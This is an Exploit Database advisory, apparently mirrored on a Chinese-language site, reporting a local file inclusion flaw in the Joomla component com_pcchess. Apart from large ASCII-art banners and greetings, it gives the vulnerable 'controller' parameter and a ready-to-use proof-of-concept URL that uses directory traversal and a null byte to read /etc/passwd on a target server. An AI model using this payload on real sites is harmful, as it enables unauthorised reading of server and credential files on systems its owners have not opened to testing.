Joomla! Component com_pcchess – Local File Inclusion

• Exploit Database
• 112 阅读

• 作者： team_elite
  日期： 2010-04-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12123/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82

  ================================================================================================ ================================================================================================ == @@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@ == == @@@@@@@@@@@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@@@@@@@@@@ == ==@@ @@@@ @@@@ @ @ @@@@@@@@ @@ @@ == ==@@ @@@@ @@@@@ @@@@@@@@@ @@ @@ == ==@@ @@@@@@@@@@@@@@@ @ @@@@@@@@@@@@ @@ @@@@@@ == ==@@ @@@@ @@@@ @@@@@@@@ @@ @@ == ==@@ @@@@ @@@@ @@@@@@@@ @@ @@ == ==@@ @@@@@@@@ @@@@ @@@@@@@@@@@@@@@@ @@ @@@@@@ == ==@@ @@@@@@@@ @@@@ @@ @@@@@@@@@@ @@@@@@@@@@@@@@ @@ @@@@@@ == == == ================================================================================================ ================================================================================================ |||||| ||| ||| [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[ [[ [[ [[ joomla Component com_pcchess Local File Inclusion Vulnerability [[ [[ [[ [[ ** Bugs Found by team_elite | http://manadocoding.net | http://www.gcc.web.id/ | [[ [[ [[ [[ ## Exploit: index.php?option=com_pcchess&controller=[LFI]%00 [[ [[ [[ [[ ## PoC: [[ [[ [[ [[- http://[target]/[path]/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 [[ [[ [[ [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[ ||| ||| ||| ||| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~Greetz and Thanks to: All member gcc, all member manadocoding ~~~~ ~~~~ ~~~~ ~~~~MC team : team_elite , devilbat , zreg ~~~~ ~~~~thanks for : cr4wl3r ~~~~ ~~~~ ~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * -, * -@@ * -@@# * -:@@; * - @@@@@......<code> * -@@@@.@@@@@@@@@@@# * - @@@@@@@@@@@@@@@@@@ * - @@@@@@@@@@@@@@@@@@@@; * -#@@@@@@@@@@@@@@@@@ * -<code>@@,@@@@@@@@@@@@@@@@@: * - @@@+@@@@@@@ @@@@@@@;@@@ * - :@@@@@@@@@:@,; @@@@@@@ .@@ * -@@@@@@@@@@@:@@@@@@@@@@ * - @@@@&apos; <code> </code> @@@@@@@@@:+. * - .@@@@@@@@@@@@@ . * - , +@@@@@@@@@@@@@ * -+@@@@@@@@@@@@@@@@@@@@# * - ,@@@@@@@@@@@@@@@@@ +@@@ * -<code>@@@@@@@@@@@@@@@@@@@ @@@ * - @@@@@@@@@@@@@@@@@@@ @@ * -@@@@@@@@@@@@@@@@@@ @@ * - +@@@@@@@@@@; @@@# @ * - @@@@@@@@@ : * - @@@@@@@@ ,@@ * -@@@@@@@@@ @@@&apos; * -@@@@@@@<code>@ @@@; * -@@@@@@@@ @.@@@@@@@@ * -@@@@@@@@@@@@@@@@@@@@@@# * - @@@@@@@@@@@@@@@@@@@@@@@@@@@ * - @ @@@@@@@ ;@@@@@@@@@@@@@@@@@ * - @ @@@@@@@@@@@@@@@@@@@,@@@@+ * - @@@@@@@@@@@@@@@@@@@@@@@ * - @@@ @@@@@@@@@@@@@@@; @@@@ * - @@@@@@@@@</code>@@@. @@. * - @@; @@@@#:@@@@@# @@. * - @ @@@: ;@ * -;` @@ ;@ * -@@@ * - @# * - : : * --------------------------------------------->>>> bugs found on 08 April 2010 by team_elite.